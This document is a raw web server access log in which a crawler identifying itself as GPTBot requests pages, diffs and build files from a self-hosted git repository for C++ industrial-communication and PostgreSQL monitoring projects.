"/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md?display=source" [Client 74.7.227.38] [Length 11014] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" +[17/Feb/2026:17:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:29:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169816] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:29:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12351] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=leastissues&state=" [Client 74.7.227.38] [Length 7659] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" +[17/Feb/2026:17:29:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=all" [Client 74.7.227.38] [Length 8482] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=open" +[17/Feb/2026:17:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" +[17/Feb/2026:17:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=all&type=all" +[17/Feb/2026:17:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10125] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:29:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:17:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=oldest&state=open&type=all" +[17/Feb/2026:17:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fvendor_formats.hpp" [Client 74.7.227.38] [Length 25917] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:29:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fcmake_install.cmake" [Client 74.7.227.38] [Length 26840] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:17:29:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fcmake_install.cmake" [Client 74.7.227.38] [Length 24205] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fold_controller.hpp" [Client 74.7.227.38] [Length 20735] [Gzip 5.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/old_controller.hpp" +[17/Feb/2026:17:29:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:29:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15346] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11069] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11129] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:17:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:17:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:17:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:17:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 